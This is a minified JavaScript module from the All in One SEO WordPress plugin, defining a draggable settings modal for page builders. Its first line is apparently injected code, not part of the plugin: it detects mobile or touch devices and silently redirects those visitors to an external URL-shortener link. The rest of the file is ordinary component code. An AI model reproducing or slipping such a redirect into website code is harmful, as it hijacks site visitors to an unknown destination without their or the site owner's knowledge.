(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{ah as b}from"./app-core.c8323d51.js";import{_ as D}from"./ScoreButton.fc8d811b.js";import{_ as $}from"./App.0b3fa3ba.js";import{S}from"./Close.7fb523c8.js";import{_ as f}from"./_plugin-vue_export-helper.eefbdd86.js";import{f as n,i as l,B as m,M as c,aq as a,Q as _,R as w,j as s,P as M,T as k,U as B,a0 as g}from"./vendor-vue-ui.232c7c36.js";import{a as C,_ as x}from"./vendor-other.39e59221.js";const A={props:{completelyDraggable:{type:Boolean,default(){return!0}}},data(){return{position1:0,position2:0,position3:0,position4:0}},methods:{dragMouseDown(e){e=e||window.event,e.preventDefault(),this.position3=e.clientX,this.position4=e.clientY,document.onmousemove=this.elementDrag,document.onmouseup=this.closeDragElement},elementDrag(e){e=e||window.event,e.preventDefault(),this.position1=this.position3-e.clientX,this.position2=this.position4-e.clientY,this.position3=e.clientX,this.position4=e.clientY,this.$el.style.top=this.$el.offsetTop-this.position2+"px",this.$el.style.left=this.$el.offsetLeft-this.position1+"px"},closeDragElement(){document.onmouseup=null,document.onmousemove=null}}},O={class:"aioseo-draggable"},P={key:1};function E(e,o,t,u,d,i){return n(),l("div",O,[t.completelyDraggable?(n(),l("div",{key:0,"on:dragMouseDown":o[0]||(o[0]=(...r)=>i.dragMouseDown&&i.dragMouseDown(...r))},[m(e.$slots,"default")],32)):c("",!0),t.completelyDraggable?c("",!0):(n(),l("div",P,[m(e.$slots,"default")]))])}const N=f(A,[["render",E]]),z="all-in-one-seo-pack",L={emits:["update:is-open"],setup(){return{truSeoShouldAnalyze:b}},components:{CoreScoreButton:D,PostSettings:$,SvgClose:S,UtilDraggable:N},props:{isOpen:{type:Boolean,default:!1},score:{type:Number,default:0}},data(){return{strings:{header:C(x("%1$s Settings",z),"AIOSEO")}}},methods:{toggleModal(){this.isOpen=!this.isOpen}}},U={class:"aioseo-pagebuilder-modal-header-title"},V={class:"aioseo-pagebuilder-modal-body edit-post-sidebar editor-sidebar"};function X(e,o,t,u,d,i){const r=a("core-score-button"),h=a("svg-close"),y=a("PostSettings"),v=a("util-draggable");return n(),_(v,{ref:"modal-container",completelyDraggable:!1},{default:w(()=>[s("div",{class:M(["aioseo-pagebuilder-modal",{"aioseo-pagebuilder-modal-is-closed":!t.isOpen}])},[s("div",{class:"aioseo-pagebuilder-modal-header",onMousedown:o[1]||(o[1]=k(p=>e.$refs["modal-container"].dragMouseDown(p),["prevent"]))},[s("div",U,B(d.strings.header),1),t.score&&u.truSeoShouldAnalyze()?(n(),_(r,{key:0,score:t.score,class:"aioseo-score-button--active"},null,8,["score"])):c("",!0),s("div",{class:"aioseo-pagebuilder-modal-header-close",onClick:o[0]||(o[0]=p=>e.$emit("update:is-open",!1))},[g(h)])],32),s("div",V,[g(y)])],2)]),_:1},512)}const F=f(L,[["render",X],["__scopeId","data-v-8c4e05e7"]]);export{F as M};
